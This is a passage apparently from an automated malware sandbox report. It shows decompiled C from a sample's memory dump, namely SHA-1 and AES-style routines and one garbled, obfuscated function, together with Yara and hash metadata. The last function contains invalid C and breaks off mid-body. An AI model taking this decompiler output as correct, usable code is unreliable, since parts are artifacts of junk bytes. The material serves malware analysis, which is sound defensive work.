            					_t404 = _v12;
            					_v12 = _t303;
            					asm("rol eax, 0x5");
            					_v16 = _t346;
            					_t532 = (_t346 ^ _t370 ^ _t404) +  *((intOrPtr*)(_t536 + _t479 * 4 - 0x140)) + _t303 + _v16 - 0x359d3e2a;
            					_t305 = _t370;
            					_v8 = _t346;
            					asm("ror edx, 0x2");
            					_v8 = _t370;
            					_t358 = _v12;
            					_v12 = _t532;
            					asm("rol esi, 0x5");
            					_t478 = _t479 + 5;
            					_t499 = (_t305 ^ _t404 ^ _t358) +  *((intOrPtr*)(_t536 + _t479 * 4 - 0x13c)) + _t532 + _v16 - 0x359d3e2a;
            					_v16 = _t305;
            					_t279 = _v12;
            					asm("ror ecx, 0x2");
            					_v8 = _t404;
            					_v12 = _t499;
            					_v8 = _t478;
            				} while (_t478 < 0x50);
            				_t480 = _a4;
            				_t480[2] = _t480[2] + _t358;
            				_t480[3] = _t480[3] + _t404;
            				_t311 = _t480[4] + _v16;
            				 *_t480 =  *_t480 + _t499;
            				_t480[1] = _t480[1] + _t279;
            				_t480[4] = _t311;
            				_t480[0x17] = 0;
            				return _t311;
            			}

            Strings
            Memory Dump Source
            • Source File: 0000000F.00000002.518976654.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
            Yara matches
            Similarity
            • API ID:
            • String ID: (
            • API String ID: 0-3887548279
            • Opcode ID: 5b5895f0e51fce406fdbb92f5fe0f57fd39733701dba8a51bdd5afbf1107f5ef
            • Instruction ID: 761c4a68b585b28a38f9816625c1c2cc86ae2b6e7acc08c6d3f539b6cea400a7
            • Opcode Fuzzy Hash: 5b5895f0e51fce406fdbb92f5fe0f57fd39733701dba8a51bdd5afbf1107f5ef
            • Instruction Fuzzy Hash: 6C022CB6E006189FDB14CF9AC8805DDFBF2FF88314F1AC1AAD859A7355D6746A418F80
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 73%
            			E00409E3C(void* __edx, void* __edi, signed int* _a4) {
            				signed int _v8;
            				signed int _v12;
            				signed int _v16;
            				char _v304;
            				signed char* _t279;
            				signed int* _t280;
            				signed int _t281;
            				signed int _t287;
            				signed int _t290;
            				signed int _t294;
            				signed int _t297;
            				signed int _t301;
            				signed int _t305;
            				signed int _t307;
            				signed int _t313;
            				signed int _t321;
            				signed int _t323;
            				signed int _t326;
            				signed int _t328;
            				signed int _t337;
            				signed int _t343;
            				signed int _t344;
            				signed int _t349;
            				signed int _t358;
            				signed int _t362;
            				signed int _t363;
            				signed int _t367;
            				signed int _t370;
            				signed int _t374;
            				signed int _t375;
            				signed int _t405;
            				signed int _t410;
            				signed int _t416;
            				signed int _t419;
            				signed int _t426;
            				signed int _t429;
            				signed int _t438;
            				signed int _t440;
            				signed int _t443;
            				signed int _t451;
            				signed int _t466;
            				signed int _t469;
            				signed int _t470;
            				signed int _t471;
            				signed int _t477;
            				signed int _t485;
            				signed int _t486;
            				signed int* _t487;
            				signed int* _t490;
            				signed int _t497;
            				signed int _t500;
            				signed int _t505;
            				signed int _t508;
            				signed int _t511;
            				signed int _t514;
            				signed int _t515;
            				signed int _t519;
            				signed int _t531;
            				signed int _t534;
            				signed int _t541;
            				void* _t547;
            				void* _t549;
            
            				_t547 = _t549;
            				_t490 = _a4;
            				_t358 = 0;
            				_t4 =  &(_t490[7]); // 0x1b
            				_t279 = _t4;
            				do {
            					 *(_t547 + _t358 * 4 - 0x14c) = ((( *(_t279 - 1) & 0x000000ff) << 0x00000008 |  *_t279 & 0x000000ff) << 0x00000008 | _t279[1] & 0x000000ff) << 0x00000008 | _t279[2] & 0x000000ff;
            					 *(_t547 + _t358 * 4 - 0x148) = (((_t279[3] & 0x000000ff) << 0x00000008 | _t279[4] & 0x000000ff) << 0x00000008 | _t279[5] & 0x000000ff) << 0x00000008 | _t279[6] & 0x000000ff;
            					 *(_t547 + _t358 * 4 - 0x144) = (((_t279[7] & 0x000000ff) << 0x00000008 | _t279[8] & 0x000000ff) << 0x00000008 | _t279[9] & 0x000000ff) << 0x00000008 | _t279[0xa] & 0x000000ff;
            					 *(_t547 + _t358 * 4 - 0x140) = (((_t279[0xb] & 0x000000ff) << 0x00000008 | _t279[0xc] & 0x000000ff) << 0x00000008 | _t279[0xd] & 0x000000ff) << 0x00000008 | _t279[0xe] & 0x000000ff;
            					_t358 = _t358 + 4;
            					_t279 =  &(_t279[0x10]);
            				} while (_t358 < 0x10);
            				_t280 =  &_v304;
            				_v8 = 0x10;
            				do {
            					_t405 =  *(_t280 - 0x18);
            					_t466 =  *(_t280 - 0x14);
            					_t362 =  *(_t280 - 0x20) ^ _t280[5] ^  *_t280 ^ _t405;
            					asm("rol ecx, 1");
            					asm("rol ebx, 1");
            					_t280[9] =  *(_t280 - 0x1c) ^ _t280[6] ^ _t280[1] ^ _t466;
            					_t280[8] = _t362;
            					_t321 = _t280[7] ^  *(_t280 - 0x10) ^ _t280[2];
            					_t280 =  &(_t280[4]);
            					asm("rol ebx, 1");
            					asm("rol edx, 1");
            					_t48 =  &_v8;
            					 *_t48 = _v8 - 1;
            					_t280[6] = _t321 ^ _t405;
            					_t280[7] =  *(_t280 - 0x1c) ^  *(_t280 - 4) ^ _t362 ^ _t466;
            				} while ( *_t48 != 0);
            				_t323 =  *_t490;
            				_t281 = _t490[1];
            				_t363 = _t490[2];
            				_t410 = _t490[3];
            				_v12 = _t323;
            				_v16 = _t490[4];
            				_v8 = 0;
            				do {
            					asm("rol ebx, 0x5");
            					_t469 = _v8;
            					_t497 = _t323 + ( !_t281 & _t410 | _t363 & _t281) +  *((intOrPtr*)(_t547 + _t469 * 4 - 0x14c)) + _v16 + 0x5a827999;
            					_t326 = _v12;
            					asm("ror eax, 0x2");
            					_v16 = _t410;
            					_v12 = _t497;
            					asm("rol esi, 0x5");
            					_v8 = _t363;
            					_t416 = _t497 + ( !_t326 & _t363 | _t281 & _t326) +  *((intOrPtr*)(_t547 + _t469 * 4 - 0x148)) + _v16 + 0x5a827999;
            					_t500 = _t281;
            					asm("ror ebx, 0x2");
            					_v16 = _v8;
            					_t367 = _v12;
            					_v8 = _t326;
            					_t328 = _v8;
            					_v12 = _t416;
            					asm("rol edx, 0x5");
            					_t287 = _t416 + ( !_t367 & _t500 | _t326 & _t367) +  *((intOrPtr*)(_t547 + _t469 * 4 - 0x144)) + _v16 + 0x5a827999;
            					_t419 = _v12;
            					_v16 = _t500;
            					asm("ror ecx, 0x2");
            					_v8 = _t367;
            					_v12 = _t287;
            					asm("rol eax, 0x5");
            					_v16 = _t328;
            					_t505 = _t287 + ( !_t419 & _t328 | _t367 & _t419) +  *((intOrPtr*)(_t547 + _t469 * 4 - 0x140)) + _v16 + 0x5a827999;
            					_t363 = _v12;
            					_t290 = _v8;
            					asm("ror edx, 0x2");
            					_v8 = _t419;
            					_v12 = _t505;
            					asm("rol esi, 0x5");
            					_v16 = _t290;
            					_t281 = _v12;
            					_t508 = _t505 + ( !_t363 & _t290 | _t419 & _t363) +  *((intOrPtr*)(_t547 + _t469 * 4 - 0x13c)) + _v16 + 0x5a827999;
            					_t410 = _v8;
            					asm("ror ecx, 0x2");
            					_t470 = _t469 + 5;
            					_t323 = _t508;
            					_v12 = _t323;
            					_v8 = _t470;
            				} while (_t470 < 0x14);
            				_t471 = 0x14;
            				do {
            					asm("rol esi, 0x5");
            					asm("ror eax, 0x2");
            					_v16 = _t410;
            					_t511 = _t508 + (_t410 ^ _t363 ^ _t281) +  *((intOrPtr*)(_t547 + _t471 * 4 - 0x14c)) + _v16 + 0x6ed9eba1;
            					_t337 = _v12;
            					_v12 = _t511;
            					asm("rol esi, 0x5");
            					_t426 = _t511 + (_t363 ^ _t281 ^ _t337) +  *((intOrPtr*)(_t547 + _t471 * 4 - 0x148)) + _v16 + 0x6ed9eba1;
            					asm("ror ebx, 0x2");
            					_t514 = _t281;
            					_v16 = _t363;
            					_t370 = _v12;
            					_v12 = _t426;
            					asm("rol edx, 0x5");
            					asm("ror ecx, 0x2");
            					_t294 = _t426 + (_t281 ^ _t337 ^ _t370) +  *((intOrPtr*)(_t547 + _t471 * 4 - 0x144)) + _v16 + 0x6ed9eba1;
            					_t429 = _v12;
            					_v8 = _t337;
            					_v8 = _t370;
            					_v12 = _t294;
            					asm("rol eax, 0x5");
            					_t471 = _t471 + 5;
            					_t363 = _v12;
            					asm("ror edx, 0x2");
            					_t148 = _t514 + 0x6ed9eba1; // 0x6ed9eb9f
            					_t515 = _t294 + (_t337 ^ _v8 ^ _t429) +  *((intOrPtr*)(_t547 + _t471 * 4 - 0x154)) + _t148;
            					_t297 = _v8;
            					_v8 = _t429;
            					_v12 = _t515;
            					asm("rol esi, 0x5");
            					_t410 = _v8;
            					_t508 = _t515 + (_t297 ^ _v8 ^ _t363) +  *((intOrPtr*)(_t547 + _t471 * 4 - 0x150)) + _t337 + 0x6ed9eba1;
            					_v16 = _t297;
            					_t281 = _v12;
            					asm("ror ecx, 0x2");
            					_v12 = _t508;
            				} while (_t471 < 0x28);
            				_v8 = 0x28;
            				do {
            					asm("rol esi, 0x5");
            					_v16 = _t410;
            					asm("ror eax, 0x2");
            					_t519 = ((_t363 | _t281) & _t410 | _t363 & _t281) +  *((intOrPtr*)(_t547 + _v8 * 4 - 0x14c)) + _t508 + _v16 - 0x70e44324;
            					_t477 = _v12;
            					_v12 = _t519;
            					asm("rol esi, 0x5");
            					_t343 = _v8;
            					asm("ror edi, 0x2");
            					_t438 = ((_t281 | _t477) & _t363 | _t281 & _t477) +  *((intOrPtr*)(_t547 + _t343 * 4 - 0x148)) + _t519 + _v16 - 0x70e44324;
            					_v16 = _t363;
            					_t374 = _v12;
            					_v12 = _t438;
            					asm("rol edx, 0x5");
            					_v8 = _t281;
            					_t440 = ((_t477 | _t374) & _t281 | _t477 & _t374) +  *((intOrPtr*)(_t547 + _t343 * 4 - 0x144)) + _t438 + _v16 - 0x70e44324;
            					asm("ror ecx, 0x2");
            					_v16 = _v8;
            					_t301 = _v12;
            					_v8 = _t477;
            					_v12 = _t440;
            					asm("rol edx, 0x5");
            					asm("ror eax, 0x2");
            					_t531 = ((_t374 | _t301) & _t477 | _t374 & _t301) +  *((intOrPtr*)(_t547 + _t343 * 4 - 0x140)) + _t440 + _v16 - 0x70e44324;
            					_v16 = _v8;
            					_t443 = _t374;
            					_t363 = _v12;
            					_v8 = _t443;
            					_v12 = _t531;
            					asm("rol esi, 0x5");
            					_v16 = _v8;
            					_t508 = ((_t301 | _t363) & _t443 | _t301 & _t363) +  *((intOrPtr*)(_t547 + _t343 * 4 - 0x13c)) + _t531 + _v16 - 0x70e44324;
            					_t410 = _t301;
            					_t281 = _v12;
            					asm("ror ecx, 0x2");
            					_v12 = _t508;
            					_t344 = _t343 + 5;
            					_v8 = _t344;
            				} while (_t344 < 0x3c);
            				_t485 = 0x3c;
            				_v8 = 0x3c;
            				do {
            					asm("rol esi, 0x5");
            					_t486 = _v8;
            					asm("ror eax, 0x2");
            					_t534 = (_t410 ^ _t363 ^ _t281) +  *((intOrPtr*)(_t547 + _t485 * 4 - 0x14c)) + _t508 + _v16 - 0x359d3e2a;
            					_t349 = _v12;
            					_v16 = _t410;
            					_v12 = _t534;
            					asm("rol esi, 0x5");
            					asm("ror ebx, 0x2");
            					_t451 = (_t363 ^ _t281 ^ _t349) +  *((intOrPtr*)(_t547 + _t486 * 4 - 0x148)) + _t534 + _v16 - 0x359d3e2a;
            					_v16 = _t363;
            					_t375 = _v12;
            					_v12 = _t451;
            					asm("rol edx, 0x5");
            					_v16 = _t281;
            					asm("ror ecx, 0x2");
            					_t305 = (_t281 ^ _t349 ^ _t375) +  *((intOrPtr*)(_t547 + _t486 * 4 - 0x144)) + _t451 + _v16 - 0x359d3e2a;
            					_t410 = _v12;
            					_v12 = _t305;
            					asm("rol eax, 0x5");
            					_v16 = _t349;
            					_t541 = (_t349 ^ _t375 ^ _t410) +  *((intOrPtr*)(_t547 + _t486 * 4 - 0x140)) + _t305 + _v16 - 0x359d3e2a;
            					_t307 = _t375;
            					_v8 = _t349;
            					asm("ror edx, 0x2");
            					_v8 = _t375;
            					_t363 = _v12;
            					_v12 = _t541;
            					asm("rol esi, 0x5");
            					_t485 = _t486 + 5;
            					_t508 = (_t307 ^ _t410 ^ _t363) +  *((intOrPtr*)(_t547 + _t486 * 4 - 0x13c)) + _t541 + _v16 - 0x359d3e2a;
            					_v16 = _t307;
            					_t281 = _v12;
            					asm("ror ecx, 0x2");
            					_v8 = _t410;
            					_v12 = _t508;
            					_v8 = _t485;
            				} while (_t485 < 0x50);
            				_t487 = _a4;
            				_t487[2] = _t487[2] + _t363;
            				_t487[3] = _t487[3] + _t410;
            				_t313 = _t487[4] + _v16;
            				 *_t487 =  *_t487 + _t508;
            				_t487[1] = _t487[1] + _t281;
            				_t487[4] = _t313;
            				_t487[0x17] = 0;
            				return _t313;
            			}

            Strings
            Memory Dump Source
            • Source File: 0000000F.00000002.518976654.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
            Yara matches
            Similarity
            • API ID:
            • String ID: (
            • API String ID: 0-3887548279
            • Opcode ID: 73dd2f901b922e6f06b93147fbaee9044beeb9fbcfd0c696aa987ac1f7b445f6
            • Instruction ID: 20804af030e5d2d51192468eb547024cdf3f7c9e85a8b02f3c82cc7c519a7834
            • Opcode Fuzzy Hash: 73dd2f901b922e6f06b93147fbaee9044beeb9fbcfd0c696aa987ac1f7b445f6
            • Instruction Fuzzy Hash: 36022CB6E006189FDB14CF9AC8805DDFBF2FF88314F1AC1AAD849A7355D6746A418F80
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 26%
            			E00402FB0(void* __eax, signed int* __ecx, signed int* __edx, signed int _a4, signed int* _a8) {
            				signed int _v8;
            				signed int _v12;
            				signed int _v16;
            				signed int _v20;
            				signed int _v24;
            				void* _t273;
            				signed int _t274;
            				signed int _t282;
            				signed int* _t358;
            				signed int _t383;
            				signed int* _t409;
            				signed int _t429;
            				signed int _t458;
            				signed int _t478;
            				signed int _t560;
            				signed int _t603;
            
            				_t273 = __eax;
            				asm("ror edi, 0x8");
            				asm("rol edx, 0x8");
            				_t458 = ( *__edx & 0xff00ff00 |  *__edx & 0x00ff00ff) ^  *__ecx;
            				asm("ror ebx, 0x8");
            				asm("rol edx, 0x8");
            				_v20 = _t458;
            				_v8 = (__edx[1] & 0xff00ff00 | __edx[1] & 0x00ff00ff) ^ __ecx[1];
            				asm("ror ebx, 0x8");
            				asm("rol edx, 0x8");
            				_t282 = (__edx[2] & 0xff00ff00 | __edx[2] & 0x00ff00ff) ^ __ecx[2];
            				asm("ror esi, 0x8");
            				asm("rol edx, 0x8");
            				_v12 = (__edx[3] & 0xff00ff00 | __edx[3] & 0x00ff00ff) ^ __ecx[3];
            				asm("ror edx, 0x10");
            				asm("ror esi, 0x8");
            				asm("rol esi, 0x8");
            				_v24 = _t282;
            				_t429 =  *(__eax + 4 + (_t282 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v8 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v12 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t458 >> 0x00000018 & 0x000000ff) * 4) ^ __ecx[4];
            				asm("ror esi, 0x10");
            				asm("ror ebx, 0x8");
            				asm("rol ebx, 0x8");
            				_t603 =  *(__eax + 4 + (_v12 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t282 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t458 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v8 >> 0x00000018 & 0x000000ff) * 4) ^ __ecx[5];
            				asm("ror ebx, 0x8");
            				asm("ror edi, 0x10");
            				asm("rol edi, 0x8");
            				_v16 =  *(__eax + 4 + (_v12 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t458 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v8 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v24 >> 0x00000018 & 0x000000ff) * 4) ^ __ecx[6];
            				asm("ror edi, 0x10");
            				asm("ror ebx, 0x8");
            				asm("rol ebx, 0x8");
            				_t409 =  &(__ecx[8]);
            				_v12 =  *(__eax + 4 + (_v8 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v20 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v24 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v12 >> 0x00000018 & 0x000000ff) * 4) ^  *(_t409 - 4);
            				_t478 = (_a4 >> 1) - 1;
            				_a4 = _t478;
            				if(_t478 != 0) {
            					do {
            						asm("ror edi, 0x10");
            						asm("ror ebx, 0x8");
            						asm("rol ebx, 0x8");
            						_v20 =  *(__eax + 4 + (_v16 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t603 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v12 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t429 >> 0x00000018 & 0x000000ff) * 4) ^  *_t409;
            						asm("ror edi, 0x10");
            						asm("ror ebx, 0x8");
            						asm("rol ebx, 0x8");
            						_v8 =  *(__eax + 4 + (_v12 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v16 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t429 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t603 >> 0x00000018 & 0x000000ff) * 4) ^ _t409[1];
            						asm("ror ebx, 0x8");
            						asm("ror edi, 0x10");
            						asm("rol edi, 0x8");
            						_t383 =  *(__eax + 4 + (_v12 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t429 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t603 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v16 >> 0x00000018 & 0x000000ff) * 4) ^ _t409[2];
            						asm("ror edi, 0x10");
            						asm("ror edx, 0x8");
            						asm("rol edx, 0x8");
            						_v24 = _t383;
            						_t560 =  *(__eax + 4 + (_t603 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t429 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v16 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v12 >> 0x00000018 & 0x000000ff) * 4) ^ _t409[3];
            						asm("ror edx, 0x10");
            						asm("ror esi, 0x8");
            						asm("rol esi, 0x8");
            						_t429 =  *(__eax + 4 + (_t383 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v8 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t560 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v20 >> 0x00000018 & 0x000000ff) * 4) ^ _t409[4];
            						asm("ror esi, 0x10");
            						asm("ror ebx, 0x8");
            						asm("rol ebx, 0x8");
            						_t603 =  *(__eax + 4 + (_t560 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t383 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v20 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v8 >> 0x00000018 & 0x000000ff) * 4) ^ _t409[5];
            						_v12 = _t560;
            						asm("ror edi, 0x8");
            						asm("ror ebx, 0x10");
            						asm("rol ebx, 0x8");
            						_v16 =  *(__eax + 4 + (_t560 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v20 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v8 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v24 >> 0x00000018 & 0x000000ff) * 4) ^ _t409[6];
            						asm("ror ebx, 0x10");
            						asm("ror edi, 0x8");
            						asm("rol edi, 0x8");
            						_t409 =  &(_t409[8]);
            						_t205 =  &_a4;
            						 *_t205 = _a4 - 1;
            						_v12 =  *(__eax + 4 + (_v8 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v20 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v24 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v12 >> 0x00000018 & 0x000000ff) * 4) ^  *(_t409 - 4);
            					} while ( *_t205 != 0);
            				}
            				asm("ror ebx, 0x8");
            				asm("rol edi, 0x8");
            				 *_a8 = (( *(_t273 + 4 + (_t429 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t273 + 4 + (_t603 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t273 + 4 + (_v16 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t273 + 5 + (_v12 & 0x000000ff) * 4) & 0x000000ff ^  *_t409) & 0xff00ff00 | (( *(_t273 + 4 + (_t429 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t273 + 4 + (_t603 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t273 + 4 + (_v16 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t273 + 5 + (_v12 & 0x000000ff) * 4) & 0x000000ff ^  *_t409) & 0x00ff00ff;
            				asm("ror ebx, 0x8");
            				asm("rol edi, 0x8");
            				_a8[1] = (( *(_t273 + 4 + (_t603 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t273 + 4 + (_v16 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t273 + 4 + (_v12 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t273 + 5 + (_t429 & 0x000000ff) * 4) & 0x000000ff ^ _t409[1]) & 0xff00ff00 | (( *(_t273 + 4 + (_t603 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t273 + 4 + (_v16 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t273 + 4 + (_v12 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t273 + 5 + (_t429 & 0x000000ff) * 4) & 0x000000ff ^ _t409[1]) & 0x00ff00ff;
            				asm("ror ebx, 0x8");
            				asm("rol edi, 0x8");
            				_t358 = _a8;
            				_t358[2] = (( *(_t273 + 4 + (_v16 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t273 + 4 + (_v12 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t273 + 4 + (_t429 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t273 + 5 + (_t603 & 0x000000ff) * 4) & 0x000000ff ^ _t409[2]) & 0xff00ff00 | (( *(_t273 + 4 + (_v16 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t273 + 4 + (_v12 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t273 + 4 + (_t429 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t273 + 5 + (_t603 & 0x000000ff) * 4) & 0x000000ff ^ _t409[2]) & 0x00ff00ff;
            				_t274 =  *(_t273 + 5 + (_v16 & 0x000000ff) * 4) & 0x000000ff;
            				asm("ror ecx, 0x8");
            				asm("rol edi, 0x8");
            				_t358[3] = (( *(_t273 + 4 + (_v12 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t273 + 4 + (_t429 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t273 + 4 + (_t603 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^ _t274 ^ _t409[3]) & 0xff00ff00 | (( *(_t273 + 4 + (_v12 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t273 + 4 + (_t429 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t273 + 4 + (_t603 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^ _t274 ^ _t409[3]) & 0x00ff00ff;
            				return _t274;
            			}


            Memory Dump Source
            • Source File: 0000000F.00000002.518976654.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
            Yara matches
            Similarity
            • Opcode ID: 937a55679482902739b3c28cbd4d4033f685ec815d12dd2f022c6521ee9f93e4
            • Instruction ID: 3a980b568be2ae1ecdc62ef5b70c599cea3cbb84bd4cfa04f309e58bee3fdca8
            • Opcode Fuzzy Hash: 937a55679482902739b3c28cbd4d4033f685ec815d12dd2f022c6521ee9f93e4
            • Instruction Fuzzy Hash: 37026E73E547164FE720CE4ACDC4725B3A3EFC8301F5B81B8CA142B613CA39BA525A90
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 62%
            			E0041E8F3(void* __eax, signed char __ebx, void* __ecx, signed char __edx, signed int __edi, signed int __esi) {
            				void* _t40;
            				signed char _t41;
            				signed char _t45;
            				signed int _t46;
            				signed int _t47;
            				signed int _t48;
            				signed int _t49;
            				intOrPtr _t50;
            				void* _t56;
            
            				_t47 = __esi;
            				_t46 = __edi;
            				_t45 = __edx;
            				_t41 = __ebx;
            				 *0xe2fd1d7 =  *0xe2fd1d7 + __edx;
            				asm("adc eax, 0xa8db6d36");
            				asm("stosb");
            				_t40 = __eax - 0xb4;
            				asm("scasd");
            				asm("rol dword [0x9dd061cd], 0xb5");
            				_pop( *0xe1d2416d);
            				 *0xe3dae4f7 =  *0xe3dae4f7 ^ __edi;
            				 *0x39bedc62 =  *0x39bedc62 << 0x38;
            				if( *0x39bedc62 > 0) {
            					L1:
            					asm("scasb");
            					_t40 = _t40 - 1;
            					asm("adc edx, [0x3b33d2bc]");
            					_push( *0x401408c7);
            					 *0xe6633f06 =  *0xe6633f06 | _t46;
            					asm("rcl byte [0x6668ccc6], 0x3f");
            					asm("rcl byte [0x2e3ce22], 0xcc");
            					_t1 = _t47;
            					_t47 =  *0xf7731b23;
            					 *0xf7731b23 = _t1;
            					asm("sbb edi, [0xfbe21aeb]");
            				} else {
            					__edx =  *0x457f937f * 0xdeae;
            					_push( *0x6774c6b9);
            					asm("sbb ecx, [0x54b7063f]");
            					__esp = __esp +  *0xac24dbc0;
            					 *0x8743fcc8 =  *0x8743fcc8 << 0x9f;
            					 *0xbbe07ec4 =  *0xbbe07ec4 & __esi;
            					if(__cl < 0) {
            						goto L1;
            					} else {
            						__edx = __edx ^  *0xb2d2ea70;
            						asm("cmpsb");
            						asm("adc [0x85ecdabe], ebx");
            						__ecx =  *0x9acd1a60 * 0x731b;
            						__ebx = __ebx ^  *0x1f95ecfc;
            						__esp = __esp ^ 0x2d75f415;
            						__al = __al - 0xa8;
            						_pop( *0x377189ff);
            						_push( *0x19b3a617);
            						asm("sbb ebp, 0xd9f4fa21");
            						__edx = __edx -  *0xf6fb03fc;
            						__bl = __bl + 0xb5;
            						asm("sbb edx, 0x749be491");
            						if(__bl > 0) {
            							goto L1;
            						} else {
            							__ebx =  *0x613c37f * 0x54ff;
            							_pop( *0xd83ec0c8);
            							asm("movsw");
            							if(__ebx < 0) {
            								goto L1;
            							} else {
            								__edx =  *0xe3de797c * 0x433a;
            								__ecx =  *0x47795d06;
            								 *0x30c1a5a8 =  *0x30c1a5a8 << 0xca;
            								__eax =  *0xba24efc4;
            								__edx =  *0xdf64cbf1;
            								_push(__esi);
            								__edi = __edi &  *0xff4674d1;
            								asm("sbb edx, [0x2118aa6d]");
            								asm("scasb");
            								asm("rcl dword [0x10c4cedd], 0x0");
            								asm("rcr dword [0xbcf142d1], 0xbc");
            								__ebx = __ebx + 1;
            								if(__ebx >= 0) {
            									goto L1;
            								} else {
            									__esp =  *0x3715107d * 0x5ea;
            									__edi = __edi + 1;
            									asm("ror dword [0x368ba083], 0xac");
            									 *0x9340670f =  *0x9340670f & __edi;
            									 *0xd3cad468 =  *0xd3cad468 + __ecx;
            									__ebx = __ebx +  *0xbc68af2b;
            									__bh = __bh + 0xd2;
            									 *0x132845e6 =  *0x132845e6 << 0xda;
            									asm("rcl byte [0x170b903c], 0x9");
            									__edx = __edx + 1;
            									__cl = 0x82;
            									_pop(__eax);
            									if(__edx > 0) {
            										goto L1;
            									} else {
            										__esp =  *0x45caa07f * 0x82f6;
            										__esp =  *0x45caa07f * 0x82f6 -  *0xe9f86e39;
            										_pop(__eax);
            										 *0xd3de6735 =  *0xd3de6735 ^ __esp;
            										 *0x9415a1df =  *0x9415a1df << 0x40;
            										asm("adc edx, [0x3a6b4595]");
            										asm("rol dword [0x9ddbb22e], 0xb1");
            										asm("sbb ebx, [0xfca3febb]");
            										asm("scasd");
            										if(( *0xa4024d12 & __ah) > 0) {
            											goto L1;
            										} else {
            											__ebp =  *0x236c967f * 0x84cd;
            											 *0xf1bec9a =  *0xf1bec9a >> 0xb1;
            											__cl =  *0xf88669e2;
            											 *0xf88669e2 = 0x82;
            											 *0xff5c0c1f =  *0xff5c0c1f - __esp;
            											1 +  *0x236c967f * 0x84cd = 1 +  *0x236c967f * 0x84cd -  *0xe6eaeeb9;
            											asm("stosd");
            											_push(1 +  *0x236c967f * 0x84cd -  *0xe6eaeeb9);
            											__edx = __edx + 1;
            											asm("rol byte [0x78ca39e2], 0xf3");
            											 *0x31bf49c6 =  *0x31bf49c6 >> 0;
            											asm("sbb [0xb05fbbc], esi");
            											__ebx =  *0x9d31e9ee;
            											__edx = __edx -  *0x440fbfa3;
            											asm("adc [0xd263f5], edi");
            											if(( *0x452466c2 & __edi) >= 0) {
            												goto L1;
            											} else {
            												asm("ror dword [0xeb0ea479], 0xeb");
            												__ecx = __ecx - 0x5d76b3f8;
            												 *0x41a98d17 = __ebx;
            												asm("adc edi, [0xb2031191]");
